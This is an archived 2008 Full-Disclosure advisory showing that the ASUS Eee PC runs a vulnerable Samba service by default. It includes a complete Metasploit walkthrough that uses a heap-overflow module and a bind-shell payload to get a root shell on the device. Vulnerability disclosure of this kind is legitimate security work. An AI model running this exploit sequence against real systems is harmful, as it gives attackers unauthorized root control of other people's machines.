lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri, 08 Feb 2008 14:47:03 -0200
From: RISE Security <advisories@...esecurity.org>
To: full-disclosure@...ts.grok.org.uk
Subject: ASUS Eee PC rooted out of the box

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

We recently acquired an ASUS Eee PC (if you want to know more about it,
a lot of reviews are available on internet). The first thing we did when
we put our hands at the ASUS Eee PC was to test its security. The ASUS
Eee PC comes with a customized version of Xandros operating system
installed, and some other bundled software like Mozilla Firefox, Pidgin,
Skype and OpenOffice.org.

Analysing the running processes of the ASUS Eee PC, the first thing that
caught our attention was the running smbd process (the sshd daemon was
started by us, and is not enabled by default).


eeepc-rise:/root> ps -e
  PID TTY          TIME CMD
    1 ?        00:00:00 fastinit
    2 ?        00:00:00 ksoftirqd/0
    3 ?        00:00:00 events/0
    4 ?        00:00:00 khelper
    5 ?        00:00:00 kthread
   25 ?        00:00:00 kblockd/0
   26 ?        00:00:00 kacpid
  128 ?        00:00:00 ata/0
  129 ?        00:00:00 ata_aux
  130 ?        00:00:00 kseriod
  148 ?        00:00:00 pdflush
  149 ?        00:00:00 pdflush
  150 ?        00:00:00 kswapd0
  151 ?        00:00:00 aio/0
  152 ?        00:00:00 unionfs_siod/0
  778 ?        00:00:00 scsi_eh_0
  779 ?        00:00:00 scsi_eh_1
  799 ?        00:00:00 kpsmoused
  819 ?        00:00:00 kjournald
  855 ?        00:00:00 fastinit
  857 ?        00:00:00 sh
  858 ?        00:00:00 su
  859 tty3     00:00:00 getty
  862 ?        00:00:00 startx
  880 ?        00:00:00 xinit
  881 tty2     00:00:06 Xorg
  890 ?        00:00:00 udevd
  952 ?        00:00:00 ksuspend_usbd
  953 ?        00:00:00 khubd
 1002 ?        00:00:00 acpid
 1027 ?        00:00:00 pciehpd_event
 1055 ?        00:00:00 ifplugd
 1101 ?        00:00:00 scsi_eh_2
 1102 ?        00:00:00 usb-storage
 1151 ?        00:00:00 icewm
 1185 ?        00:00:01 AsusLauncher
 1186 ?        00:00:00 icewmtray
 1188 ?        00:00:01 powermonitor
 1190 ?        00:00:00 minimixer
 1191 ?        00:00:00 networkmonitor
 1192 ?        00:00:00 wapmonitor
 1193 ?        00:00:00 x-session-manag
 1195 ?        00:00:00 x-session-manag
 1200 ?        00:00:00 x-session-manag
 1201 ?        00:00:00 dispwatch
 1217 ?        00:00:00 cupsd
 1224 ?        00:00:00 usbstorageapple
 1234 ?        00:00:00 kondemand/0
 1240 ?        00:00:00 portmap
 1248 ?        00:00:00 keyboardstatus
 1272 ?        00:00:00 memd
 1279 ?        00:00:00 scim-helper-man
 1280 ?        00:00:00 scim-panel-gtk
 1282 ?        00:00:00 scim-launcher
 1297 ?        00:00:00 netserv
 1331 ?        00:00:00 asusosd
 1476 ?        00:00:00 xandrosncs-agen
 1775 ?        00:00:00 dhclient3
 2002 ?        00:00:00 nmbd
 2004 ?        00:00:00 smbd
 2005 ?        00:00:00 smbd
 2322 ?        00:00:00 sshd
 2345 ?        00:00:00 sshd
 2356 pts/0    00:00:00 bash
 2362 pts/0    00:00:00 ps
eeepc-rise:/root>


Retrieving the the smbd version, we discovered that it runs a vulnerable
version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit
we published earlier last year.


eeepc-rise:/root> smbd --version
Version 3.0.24
eeepc-rise:/root>


With this information, we ran our exploit against the ASUS Eee PC using
the Debian/Ubuntu target (Xandros is based on Corel Linux, which is
Debian based).


msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10
RHOST => 192.168.50.10
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Linux vsyscall
   1   Linux Heap Brute Force (Debian/Ubuntu)
   2   Linux Heap Brute Force (Gentoo)
   3   Linux Heap Brute Force (Mandriva)
   4   Linux Heap Brute Force (RHEL/CentOS)
   5   Linux Heap Brute Force (SUSE)
   6   Linux Heap Brute Force (Slackware)
   7   DEBUG


msf exploit(lsa_transnames_heap) > set TARGET 1
TARGET => 1
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
...
[*] Trying to exploit Samba with address 0x08415000...
[*] Connecting to the SMB service...
[*] Binding to
12345778-1234-abcd-ef00-0123456789ab:0.0@...cn_np:192.168.50.10[\lsarpc] ...
[*] Bound to
12345778-1234-abcd-ef00-0123456789ab:0.0@...cn_np:192.168.50.10[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.168.50.201:33694 ->
192.168.50.10:4444)
msf exploit(lsa_transnames_heap) > sessions -i 1
[*] Starting interaction with 1...

uname -a
Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686
GNU/Linux
id
uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)


Easy to learn, Easy to work, Easy to root.


The original blog post and more information can be found in our
website at http://risesecurity.org/.

Best regards,
RISE Security
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFHrIeHhFjK78TGSUERAvq7AJ9iz2sHD4/cQ0CdlCC1axNiVhwmJwCfddEd
6tg6XRBCWHfPWFrSdVKu5oA=
=OFwe
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists